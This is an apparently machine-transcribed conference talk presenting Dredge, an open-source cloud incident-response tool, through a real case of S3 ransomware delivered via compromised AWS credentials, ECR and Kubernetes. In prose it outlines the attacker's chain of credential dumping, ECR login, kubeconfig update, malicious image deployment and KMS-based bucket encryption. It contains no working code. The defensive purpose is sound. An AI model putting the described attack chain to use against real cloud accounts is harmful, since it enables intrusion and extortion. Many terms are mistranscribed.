
I'm going to talk to you a little bit about an open source tool that we released, that is used to make incident response in the cloud. The idea of this talk is to approach it from a history of a real incident that happened to us, that we had to attend to a client and how we use this tool to be able to cover those differences that usually exist in teams, especially when we are working with incident response issues in environments as technical and specific as the cloud is today. First of all, I introduce myself, I'm from Argentina, from Buenos Aires. I'm the CTO of Solidity Labs and previously I worked many years as an incident responder and before that
as a cloud architect and before that as a police officer in the Federal Police. My background comes from the point of view of incident response, embracing cloud issues since 2017, 2018. So I could see mature in a lot of ways, how those techniques started to be made and how the attackers were trying to compromise these ecosystems from more advanced positions to less advanced ones. So, the idea is to tell you a little bit about how an incident looks from a C-SERV, unlike how it looks in theory and how we have to cover those differences with open source. We found out about the incident because the client called us and said that he saw this. What is this?
This is that the web page that was serving the web site of our client had been encrypted. If you can see here, it says "Server-side encryption AWS KMS Manager Key". What does this mean? Our client is using AWS to host his website in a S3 bucket. Who here works or knows about AWS? Great, great. Did anyone ever try hosting a website in a cd-back? It's something super simple that is reused. The drama is that if you don't properly garden the infrastructure, it can come to these conclusions. As always, in the environments there were no alerts, there was no security detection. So we found out about the impact, which is how it usually happens in most real incidents. Most detections usually give with indications that come in false positives, a
question of the noises generated by the same detection strategies. We, When we worked with a C-SIRT, we worked in those cases where the whole triage stage had already passed. So, when we already had the incident confirmed. Since they didn't have alerts, we didn't know where the attack came from either. So, the only thing we had as a reference was that their site had been encrypted. Why Dredge? Imagine the number of organizations that move to the cloud today, in particular with the possibility of being enhanced with all the artificial intelligence and JAT GPT. It is very easy for a company to go into production with an application working. But, when it comes to defending it, it's
already very difficult to get talent and tools that can help to harden that infrastructure. And I'm not even telling you to do security detection strategies, blue team, threat hunting, and all those things that are of much higher level. Especially when things like today happen with Cross-Track, right? It's not that an attacker is compromising us, but because of lack of internal processes, we don't validate the things that are running within our infrastructure and we end up with our own allies attacking us, right? It happens a lot in startups that, for example, if I have Cross-Track installed on my computer, I should be able to validate before the patch applies, right? But that doesn't happen. So we
end up having to do an incident response of our internal same, again, without much information. So, from the point of view of a C-Cert, there are two ways in which an incident can be appreciated. The good side is when we prepare ourselves, and the bad side is when we don't prepare. The bad side will inevitably happen to us, because we can't prepare for everything. What we have to do is strategically reduce the unknown to knowns, so that it is the best number of incidents that come from the bad side, and the best number of incidents that come from the good side, because incidents will happen. As a reference to those who like to take photos
and that, the QR code down there is the repo where Dredge is published and the whole presentation is also uploaded there, so if you want to download it, you can download it from there. Dredge is a tool to do incident response. It is specifically designed for this case, yes? to help us when we have to deal with an incident for which the defender did not prepare properly or when the attack exceeded the preparation of the defender. Why? Because when I have the preparation, I have many more ways to investigate what is happening. I have many more sources of logs, I have alerts, I have a scaling matrix, I know the infrastructure I use, And the
big drama with the cloud is that many times, and in many companies, the same security teams do not know that the company is using the cloud. It is very common to find cases in Yadu IT where the marketing manager puts his card, buys a subscription in AWS, GCP or Azure to host a website where he spends $20 per year, but he is collecting sensitive information from the company. And the vast majority of the tools that allow us to solve this problem cost a lot of money or require a lot of effort. But it's important to understand the theory of how you expect an attack from reality. When you see the theory of how an attack
works, in any case, and also in the cloud, we think we have an attack and we know where to look for the locks. But the big thing is that sometimes we go through different stages, realizing that we don't even know if we have an attack, if we are the ones who are generating problems, if it's a feature that actually happens as a bug, or if it's something that's wrong. So, to get to this point requires a lot of effort. Not to mention that the vast majority of cybersecurity roles are either very specific, that is, people are super specialized in what they do, or they are very generalistic. There is no middle ground. And in particular
in Argentina, and I suppose something similar should happen here, when a person specializes in issues of incident response or cloud, it is very likely that a company that pays much better will come and say, So, since we, at BounceCert, have to train them in a bunch of clouds, imagine an analyst who starts working and we train him in AWS and there's an incident in Azure. It's similar but not the same. Or there's an incident in GCP. Or it's an incident in Kubernetes. From a theoretical point of view, all components are similar. But from a practical point of view, there are many differences. So the goal of Dredge is that a list can respond to incidents
in different cloud environments, knowing how to respond to an incident in the cloud. So, if I know that I have to block an IP, I don't have to worry about knowing how to block an IP in AWS or how to block an IP in GCP. I can execute the command that says "block my IP" because it's a tactical issue that requires a lot of speed. From the point of view of engineers and DevOps, They have another problem. They are there to make the company's time to market as low as possible. They are there to make the feature reach production. So, in those cases, they don't take care of learning about security. But when an incident
occurs, they have to respond the same way. And many times they don't have the assistance. So, a DevOps or an engineer knows what to do, but doesn't know how to do it. So, maybe they understand that they have to block the IP, but they don't know the details. Or they understand that they need to collect information, but they don't know what information. The vast majority of the tools that offer cloud information are designed from a compliance point of view. What does this mean? That it offers a lot of data, and at the moment an incident is noise. We will see it when we see the demos. I don't like PPTs very much, so I'm going
to try to pass this as quickly as possible so that we can jump to the demos. What we did is try to make sure that the recognition that is made about the infrastructure from the point of view of the analyst or the engineer is that information that we need to respond to the incident, no more, no less. So, what does Dredge do? Dredge has four fundamental modules: Log Retriever, Threat Hunting, Incent Response, and Cloud Status. We started with Cloud Provider. Cloud Provider is a tool that allows us to work with APIs of the different Cloud providers to obtain the logs that we need. Have you ever tried to download a log from a S3 package?
Have you ever had that need? Well, notice that the whole auditorium is only you. Most people implement the logs, store them in the C3 bucket, and then they don't know how to get them out. It's like, we do what the security strategy tells us, but we don't worry about how to download them. Especially when they are small companies that don't have a SIM or tools to process those logs. So, in the event of an incident, we have to quickly access that log and we don't know how. Dresh allows us to download the logs from all C3 buckets in a simple way with a command. There are times when, in AWS for example, the vast majority
of the logs that matter to analyze an incident are the ApiCol logs. We'll see that later, but they are the logs that are stored in CloudTrail. If I don't have CloudTrail enabled, it's very complicated to solve an incident because in theory I can't see what happened in my tenant during that time. But AWS has them enabled by default in a tool called Event History. The thing is that collecting them by API is super complicated and collecting them by console is even more complicated. So basically what we did was a script that automates that process so that you can download those logs in a simple and easy way and be able to do it with the
different problems. The same applies to Kubernetes logs, pods, Docker containers. Notice that when you start to see the amount of information that you need to have in the ecosystems with the technological stacks that we always use, the vast majority of cases we don't even have them in mind. If we don't have them in mind, we don't know how to get them out. So the idea is to be able to pave the way for everyone to be the same. Then, within the Threat Hunting tools, what we incorporated were some scripts that allow us to enrich the information we are seeing. For example, it happened to us that suddenly we had giant data bulks and we had
to filter through the IPs. And we had to be looking for a grep command that allows us to filter through the IPs. But we also wanted to know only the public IPs, or the public IPs that have a certain connotation for us, or cross them with certain IPs that we know are bad. So, we have all that test battery added within the Threat Hunting exercise. What else can we do within Threat Hunting? We can enrich those IPs with queries to Shodan or VirusTotal. So, from the analyst's point of view, it's much easier to work from the CLI without having to copy and paste each of the IPs within the Shodan or VirusTotal frontend. Also, what
we can do, which is not added here, is to obtain P-calls with known bad reputation. all the ways to attack the cloud are fully documented, at least from a basic point of view. So, what we are going to do is run this tool, looking for the API calls within our AWS team, and it will tell us which of those API calls are known for persistence. For example, if I see the creation of a SSH key, within the AWS tenant. If I see that a port has been opened through Security Group or a firewall network or whatever the way it is applied inside the cloud. If I see that the way my GitHub repo is being
hardened has changed. All these types of issues that are not trivial, we have them automated here so that with a simple command, the analyst can at least do a triage in a much simpler way. Then we have another module called Incident Response. Incident Response allows us to automate non-trivial actions that we use to contain the incident. For example, disable credentials. In all the talks we see that have to do with AWS, they say, "They compromise user credentials, they compromise credentials, they compromise a role." Well, disabling credentials is not trivial in different cloud environments. They are executed differently. So we found that way. The same with servers. Blocking an IP in AWS is super different from
blocking it in GCP. For analysts, it has to be transparent. With Batch, we can do it. We can, for example, work on the S3 buckets and put them in private when they are public, we can enable logs that are disabled, we can work on credentials, there are many things that allow us to facilitate this task. As it is a script, we can also automate on that. A very common case is, for example, I have a commitment indicator, that is, I know that this IP is attacking me, and I have to block it. But I have 200 accounts within my tenant, and within each account I have 10 VPCs. That process of blocking that IP in
all networks of all accounts is ultra complicated unless I can script it. So, with Dreyfus we can do that scripting. And finally, Cloud Status is a tool that allows us to obtain strategic information, as I said before. If I want to see the users of a AWS account, I'm not so interested in seeing all the metadata information that AWS gives me, which is a lot, but I'm interested in seeing, for example, the date of creation. Tools like CloudSploit don't tell me when the user was created. Why am I interested in knowing what the date of creation was? And basically because I want to know if it was before or after the incident. Same with credentials,
with access keys. If a credential was created moments after the incident, it gives me the indication that that credential may be malicious and gives me the perspective that I have to start investigating there. This is a work in progress, we keep adding features, we are accommodating all the things that we see that are necessary to integrate them and we are adding them here. So, any collaboration is also super well received. So, the idea is, we are going to do a Dredge setup, I'm going to show you how it is configured, how it is set up. We are going to go through a little bit of the incident that I was telling you about the ransomware
in S3, so you can see how that works and how we use the tool to investigate it, so that we can see it in action. Well, this is the Dredge repo. This is the documentation where you can see basically a small description of what it does, what I just told you now, the functionalities that we have and that we are about to integrate in a JSON format that has a lot of information, later we will work on one in particular. But we started to give ourselves the idea of something kind of weird within one of the components that was working with Kubernetes. Unfortunately, the Kubernetes logs that are enabled like this were all disabled. That
is, everything that was working on the cluster was disabled. With Dredge, we can enable all the logs with one command. It doesn't allow us to go back and understand what happened, but it does allow us to start monitoring what will happen in the future. So if the attack continues to work on our infrastructure, we will be able to start seeing it. Within what we had seen, within Event History, we could see: Logs of API Key that were working on a KMS key that we did not have identified. That is to say, there was someone creating decrypted keys to encrypt components within our tenant. Which was, by the way, complicated, because why is there someone creating
this when we do not work with that service? So, I'm going to show you how we obtained the logs with Dredge from Event History. Do you see this "if"? Can you see it? So, Dredge starts bringing me all the logs from that account in JSON to analyze. This we can dump a text file and work with the traditional tools that we always use, WBK, jQuery, whatever. So, the file will be in the dumpDredge and we will be able to see all the different files. This is an example of how it can be analyzed. As you can see, with jQuery we could do the queries that we need to be able to see specific questions, such as user agent, source IP,
and all the questions that we may be interested in within the incident. As you can see, the idea is that it is with a command. If I have to do that manually, I have to enter the WBS console, that is to say, I have to create a user with console management permissions, which is already a risk. I have to be able to enter the event history and be able to do this analysis within the WBS web interface, which looks like this. Where I can see a maximum of 50 events or 100 events at the same time, I have to start working with the page, which makes everything look much more complex. So, in this way,
we solve it much simpler. In particular, if I have 5 accounts, here I have to log in to a WS account, bring the events, unlog, log in to the next account, bring the events. In contrast, with Dredge, I can execute 5 iterations of script or script it so that it works with 5 different accounts or 5 different profiles and I can download all the information at once. This is how the CloudTrail log looks like. We can see the KMS create key, which means that the attacker was creating a key of encryption within WS. We can see the user agent, which says "vote 3 Python". This means that the attacker is using an automated tool to
be able to execute this creation. And then detailed descriptions of the metadata of the action. But basically what I can see within the CloudTree log, I can see for example the source IPs where that was executed. What caught our attention even more is a PICOL called "GetAuthorizationDoken". This PICOL refers to an authentication against an ESR. An ESR is called Elastic Container Registry, which is where a company can save their Docker images to run them inside their network. That is, if I have a secure environment, the execution of my code will come from a source that I trust. The source I trust is my registry. But what happens? If a person can authenticate against my registry,
that source of trust is vulnerable. So we could see that there was a guest authorization token, that is, that there was someone who was authenticating from an IP that was from AWS. That was kind of weird. But well, this gave us a clue because it also came from IOSIS 1 when all our infrastructure was in Sao Paulo. So suddenly there were mismatches that said, why is there someone who is executing things from a region that we don't use? We started to investigate and we realized that within the infrastructure's organigram, they had enabled it so that things could be displayed in Kubernetes from the SR. But the SR could be managed by any of the DevOps.
So, suddenly, there was a whole flow in which someone had authenticated the SR, had uploaded an image following these commands, and had managed to put their image, vulnerable, inside the SR and had been able to run it inside the Kubernetes cluster to execute this ransomware. We were able to do this by analyzing the logs of Event History, which allowed us to do all the traceability, even though when we started filtering, we saw things that came from AWS, we could identify that the first APICOL came from AWS. So that allowed us to do a cross-analysis and identify which was the IAM user that was running this, which was a user of an engineer who had been
compromised. The IAM users have policies. The policies are what allow them to do or not do things. This user, as in a DevOps, was a full admin. That is to say, he had an action allowed, an asterisk resource. This is ultra-critical, but it is usually done with a question of time to market. The company says, well, we have to do it fast, we are going to do it like this, then we fix it, but they never fix it. They compromised the credentials, they managed to access the ICR, and in that way they were able to compromise the Kubernetes cluster. The architecture was more or less like this, as you can see there were different components.
We have EKS, which is the way AWS uses to run Kubernetes. We had the S2 servers, which were the servers that were used to run the cluster. The problem with the S2 servers is that, as they are part of a Kubernetes cluster, they are created and destroyed constantly. So we couldn't work on that information to obtain logs. Then they had a load balancer, they had the WAF, they had the SR with Docker images and they were sending some S3 stuff. More or less this is how the infrastructure looked like, and that's what allowed us to do the research. Now, once we've identified that, we have to see which are all the users to see if
there was any other user within the commitment. So basically, we run Dredge again, but this time we use the Cloud Status module. Again, we say AWS, we give it the profile to authenticate, we give it the region and we say bring me all the IAM users. So Dredge is going to run and bring me all the IAM users. As you can see, it doesn't bring me all the information I need.
It doesn't bring me all the information I don't need. It brings me if it has MFA enabled, which is something that I usually have to look for, I can't get it directly. It brings me when the creation was, it brings me if it has access to consoles. That's all the information that we need to understand the possibility of a user's commitment. Because if it has MFA, it's much harder to commit it than if it doesn't have it. Now, if one of the users has MFA, it's much easier. Another thing we can do is work on the access keys directly without having to go through the users. If we know there is a committed access key, many times we don't know which user
it refers to. So we can start working in that sense. We can execute Dredge with the Cloud Status tool. And it will tell us, we will pass it to the profile, we will pass it to the region to authenticate ourselves, and it will tell us which are the access keys that exist in that account, if they are enabled or not enabled, and when they were created. See? And to which user it belongs, which also helps us to start doing that analysis. If I have an attack where I see an access key and I don't know which user, I can start matching it from this way. We worked a lot with the Kubernetes Post logs, because with the Kubernetes logs we can see where things are being executed.
We can see where the pods and the images are being created. We also found the authentication of the attacker to the Kubernetes cluster using the CLI and QCTL. What was the impact? As we saw, the impact was a compromise of the S3 bucket through a ransomware. How does a ransomware work in S3? Basically, what the attacker does is download the objects that are in the bucket to make the information leak. And then, he uploads an encrypted object with a new key. So, he creates a decrypted key and creates that object with that decrypted key inside the bucket. And then, he erases the user that joins that key. The decrypted keys between WS have an owner. If that owner is not even a root user or an
admin user, it will be able to see it. Which is ultra-complex, because I can be extremely the most root of the roots, and I will never be able to use that key again. So I will not be able to decrypt the objects that are inside the bucket. The problem is that the logs that are generated inside AWS are from the S3 bucket, not the object from the bucket. So if I don't have the S3 bucket's data events previously enabled, I won't be able to see what's happening with the S3 bucket, with the objects that are inside the S3 bucket. So, now I'm going to show you a demo of how the initial access was. Just as an initial access to Kubernetes
was saved, basically what the attacker did was dump the AWS credentials. These credentials are no longer used, so don't worry about it. Then what it will do is a "sts get caller identity". This api call is like a "juamai" inside of WBS. What this api call allows me to do is understand "Hey, which users am I using here? And what permissions does it have?" As you can see, this is an Eterra user. It's a user that used DevOps to execute its infrastructure as a code. Then it tries to understand if the user has a login profile. If I can't connect to the console, I can't connect to the console. So Now, the attacker had a user, IAM, that was executed, that was designed as a
service user, but with console access. When we get the user list with Dredge, we can see if the user has console permissions or not. So, if I see that I have a user, that my active inventory works as a service user, but in the Dredge output it has console access, it's bad, right? From this we can also learn what are the API calls that interest us to detect a lateral movement or an elevation of privileges. These API calls are not detected with traditional detection tools like GuardDuty, so they allow us to generate more advanced detection cases that do allow us to detect this. This is how the access to the WBS console looks like. As
well as the attacker moves once he has access to the Container Registry. What he will do is log in with this GetLogin password, with the region and the profile, if he will pass the profile that he committed, and he will make a Docker login. This will allow him to work with the Docker Registry. Then he will be able to make a Docker PS to work with all the images that he has on his computer. Here I am going to show you how authentication works with against Kubernetes. The attacker can do a list cluster, that is, use the AWS tool to know if there is a Kubernetes cluster running. This way, he can know where to
run his image. Then what he will do is to run an update, QConfig, with the profile and the user compromised. This way, he moves from AWS to the Kubernetes cluster. Again, another APICOL that I know is malicious in the event that it is from a user who should not do it. If I see that my Terraform user is moving to make a QCDL, which is a specific action of user and not of service user, it is bad. And here it will run a manifest with an unprompted image. Well, how do we proceed to the answer? How did we respond? The first thing we did was to identify, we did a triage, we identified that we
could delete that user. Since we were very involved in the process and we had direct access to the CTO and the technology part, we were able to validate that we could delete that user without affecting the business process. The idea is not always to try to avoid generating more downtime than we are doing. So, having corroborated that, we proceed to delete the user. Again, with dh we run the INSEAN response module, we tell it that we are going to go to AWS, so we have to re-authenticate it, and what we are going to say is: delete the IAM user with the username, that's it. Dredge is going to delete an IAM user, it's not trivial,
it has to do several things, because the IAM user has several previous components. But to delete the access keys, I have to attach the policies, I have to get them out of the console access. If I want to delete an IAM user without doing these things before, what's going to happen is that my api call is going to fail. So, if the incident responder is not trained in the things it has to do previously to do that, what's going to happen is that it's going to fail those api calls, or it's going to try to do it, but it's not going to be able to do it, and that takes time. So, we, within the
script, what we did is all the things that we have to validate so that that user is deleted without having to have those impediments. Then we did an IP analysis. Again, about the APICODES we had, we ran the module to obtain the source IPs. This is an example. So what we did is, we ran dredge, the threadhunting module, and we said, tell me all the IPs that are in this file. And basically, it gives me an output of all the IPs that are in the file. Then what we're going to do is run it against VirusTotal. What it's going to do is run, we pass the key to VirusTotal, and what it's going to do
is, to analyze that file, run it against the API of VirusTotal and it will tell us if those IPs are identified as malicious inside VirusTotal and what is the origin, what is the hosting that is running it. That allows us to understand where they are attacking us, what is the country, if it has to do with what we normally use. As you can see, we have several Amazon IPs and we have a couple from Argentina and we have one from the United States. That can be... It can be super trivial, of course. Many times we find that we have Chinese IPs, for example, and integration with VirusTotal allows us to understand that. We can quickly
understand that there are IPs that come from Amazon servers, that we can discard or not, but at least we have that information in a super fast way. This is another example of how to enrich with VirusTotal, maybe you can see it better. Here I will work with less IPs so that it is faster. But basically it's the same, we pass the total key of virus, we pass the dump, for example in this case of alertas of guard duty, and we will know which are the countries, if it is bad or not, and what is the ASName and the ASNumber. If we are working with an ASNumber in particular, for example we know that the attacker
comes working from this side, or for example uses such provider of cloud to execute attacks, or we know that there is an attacker in particular that starts attacking us from GCP, we can start to request to our servers that they come from GCP, for example. Another thing we can do is enable security detection. As I said, in the case of our incident, the company did not have GuardDuty implemented. We can only enable it and we can also obtain it. It happens the same as with Event History. If I have 100 accounts and I have to enter the GuardDuty events in all accounts, it becomes quite annoying because I have to enter each one of the
accounts. But we can do them all in a scripted way. Again, Log Retriever module, we authenticate, see that the methodology is the same for all cases, so it's much easier to approach an analyst knowing that he has to use the Log Retriever module and see what are the logs he can get. And there we download all the logs from GuardDuty in JSON to be able to do the analysis. What is this for? Again, I can query it with JQ, I can do it, I can ban the IPs and I can do an analysis much faster as if I were looking at the console manually at each of the events, yes? working with the S3 bucket,
as I said, the S3 bucket is a static web hosting, right? It means that, by definition, it has to be public on the internet. That is, it is part of the need. Many times when one does an analysis, they say, hey, we have to block all public buckets. No, because there are buckets that are intended to be public. But the incident, and during the process it is good to block it, to avoid that, to be able to do it in an internal way, that not everyone is finding out that our web page was encrypted, right? So, with the incident response module, the same, we can work in the same way, and in the same way,
repeatable. We will give the incident response module, we authenticate, we pass the command to block the S3 bucket, and the tool will block it. It will disable public web access. Wait for it. Again, disabling public access is not a trivial task, especially if you have a lot of buckets. As you can see, it's much easier for us with the tool. The last demo I wanted to show here is how to block an S2 instance inside AWS. There is a problem with blocking, to isolate at the networking level of the C2WS instances, is that networking within the cloud works very differently. For example, in GCP, I can block or delete with a firewall rule. In AWS I have two types of firewalls. I have
the security groups that allow me to authorize and the network access control lists that allow me to block. Normally in response procedures, what is done is, if I have a security group that allows me to access that server, what I usually do is change the security group to a forensic security group, so that no one else can connect to that server. The problem is that this action does not cut the existing connections. So if I have persistence in the server, even though I can not reconnect anymore, I do not get kicked. So I still have persistence in the server and it allows me to execute other persistence methodologies within the server. For example, the resources
within AWS, in turn, have permission to execute actions on the cloud. So I have persistence in the server and the server has access to AWS, I can make a lateral movement within AWS with the server credentials. So, as this process is not trivial, again, we also automate it. We use dredge, cloudstatus, Again, we want to bring all the servers. It's a little bit longer. So, what we're going to do is bring all the AWS servers. So, I have my server, where it is, in which region, if it has the metadata version 1 enabled, that is, if I land inside the server, I can open the server credentials, and what is the role? That is, what
are the permissions for AWS that this server has? That is super important. Then I can analyze the security groups that this server has to know what the permissions are. But they are questions that a Closed Security Postal Management doesn't give me. So, in that way, I already referred the server with two commands without having to be trying to do it manually from the console. Then what I'm going to do is call the incident response module, I'm going to use the responder function, and I'm going to tell it: isolate me in the instance C2. Simple and simple, I don't have to do anything else. So what it's going to do is: It will obtain certain server
data, for example, the security groups, the VPCD, it will create a new access control list to block the server of all the connections, that is, it will kill all the connections, it will restore the previous network access control list, that is, it will give permissions to the server to connect with the internet, so that the new connections, for the connections that have to exist, will still function, and only kill the persistence. It will create a forensic security group and assign a forensic security group to the server. In that way, it will start again. That way we have our server with the Security Group of Friends, as I explained. We put a Network Access Control List
to block all accesses and at the same time we opened it to take out so that if there was something else inside that network that needed to be communicated, it could be communicated. You followed me here, it was very fast. How did we get here? Well, for the end, and so that you can think if you have any questions, I'm going to show you how the Ransomware in S3 works. This is something that we found super interesting because it's not something common. The Ransomware in S3, as I said, It operates in a very methodological way. The info is downloaded, the encryption key is created, the objects are encrypted and the ransom note is uploaded so
that the defender knows that their bucket was encrypted. Now I'm going to let them download the Android if they want to have the code, which is open source. We'll do the demo and we'll go to the first one.